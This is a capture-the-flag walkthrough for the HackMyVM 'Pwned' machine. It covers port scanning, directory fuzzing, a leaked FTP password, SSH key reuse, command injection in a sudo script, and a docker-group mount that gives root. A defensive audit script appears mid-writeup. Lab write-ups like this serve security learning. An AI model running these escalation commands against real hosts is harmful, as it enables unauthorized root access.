NOTES ABOUT Pwned

[ 2022-10-21 ] [ HackMyVM / Pwned ]

Status: Rooted
Skills: Port Scanning, Fuzzing
Tools: nmap, ssh, ftp, gobuster, curl, docker

PORT SCANNING

$ nmap -T4 -sCSV -p- 10.0.2.

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA)
| 256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA)
|_ 256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Pwned....!!
|_http-server-header: Apache/2.4.38 (Debian)

GETTING IN

$ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.0.2.33
/nothing (Status: 301) [Size: 308] [--> http://10.0.2.33/nothing/]
/server-status (Status: 403) [Size: 274]
/hidden_text (Status: 301) [Size: 312] [--> http://10.0.2.33/hidden_text/]


$ curl http://10.0.2.33/hidden_text/secret.dic -O
$ gobuster -q fuzz -w secret.dic -u http://10.0.2.33/FUZZ
[...]
Found: [Status=301] [Length=311] http://10.0.2.33/pwned.vuln
[...]

$ curl http://10.0.2.33/pwned.vuln/
[...]
// if ($un=='ftpuser' && $pw=='B0ss_B!TcH') {
[...]

$ ftp 10.0.2.33
Connected to 10.0.2.33.
220 (vsFTPd 3.0.3)
Name (10.0.2.33:kali): ftpuser
331 Please specify the password.
Password: B0ss_B!TcH
230 Login successful.
[...]
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Jul 10 2020 .
drwxrwxrwx 3 0 0 4096 Jul 09 2020 ..
-rw-r--r-- 1 0 0 2602 Jul 09 2020 id_rsa
-rw-r--r-- 1 0 0 75 Jul 09 2020 note.txt

$ ssh ariana@10.0.2.33 -i id_rsa

ariana@pwned:~$ cat user1.txt
congratulations you Pwned ariana

Here is your user flag ↓↓↓↓↓↓↓

**************************

Try harder.need become root

ELEVATING PRIVILEGES

ariana@pwned:/$ sudo -u selena /home/messenger.sh
[...]
Enter username to send message : a

Enter message for a :bash

Sending message to a
id
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)

cat /home/selena/user2.txt
**************************

You are near to me. you found selena too.

Try harder to catch me

docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
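The root shell above comes from selena's membership in the docker group, which lets any member bind-mount the host filesystem into a container. As an added defender-side check (not part of the original writeup), the script below parses an /etc/group excerpt and `docker inspect` style JSON to flag docker-group members and containers that bind-mount the host root or the Docker socket; the sample data is constructed and the container names/IDs are hypothetical.

```python
"""Audit helper: who is in the docker group, and which containers expose the host?"""
import json

# Constructed /etc/group excerpt mirroring the writeup's finding (115(docker) for selena).
SAMPLE_GROUP_FILE = """root:x:0:
sudo:x:27:ariana
docker:x:115:selena
"""

# Constructed `docker inspect` style output; field names follow the real inspect format.
SAMPLE_INSPECT = json.dumps([
    {"Id": "aaa111", "Name": "/escape", "Config": {"Image": "alpine"},
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt", "RW": True}]},
    {"Id": "bbb222", "Name": "/web", "Config": {"Image": "nginx"},
     "Mounts": [{"Type": "volume", "Source": "/var/lib/docker/volumes/w/_data",
                 "Destination": "/data", "RW": True}]},
])

# Host paths whose bind-mounting into a container is equivalent to handing over root.
SENSITIVE_PATHS = {"/", "/etc", "/root", "/home", "/var/run/docker.sock", "/run/docker.sock"}


def docker_group_members(group_text):
    """Return the users listed in the docker group; each of them is effectively root."""
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == "docker":
            return [u for u in fields[3].split(",") if u]
    return []


def host_exposing_mounts(inspect_json):
    """Return (container, source, destination, rw) for bind mounts of sensitive host paths."""
    findings = []
    for container in json.loads(inspect_json):
        for mount in container.get("Mounts", []):
            if mount.get("Type") != "bind":
                continue  # named volumes live under /var/lib/docker, not on the host root
            src = mount.get("Source", "")
            normalised = src if src == "/" else src.rstrip("/")
            if normalised in SENSITIVE_PATHS:
                findings.append((container["Name"].lstrip("/"), src,
                                 mount.get("Destination"), bool(mount.get("RW"))))
    return findings


if __name__ == "__main__":
    print("docker group members:", docker_group_members(SAMPLE_GROUP_FILE))
    for name, src, dst, rw in host_exposing_mounts(SAMPLE_INSPECT):
        print(f"container {name}: host {src} mounted at {dst} ({'rw' if rw else 'ro'})")
```

On a live host, feed it `cat /etc/group` and `docker inspect $(docker ps -q)`; any docker-group member who is not meant to be an administrator is the finding to fix.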

# cat root.txt
**************************

# init 0
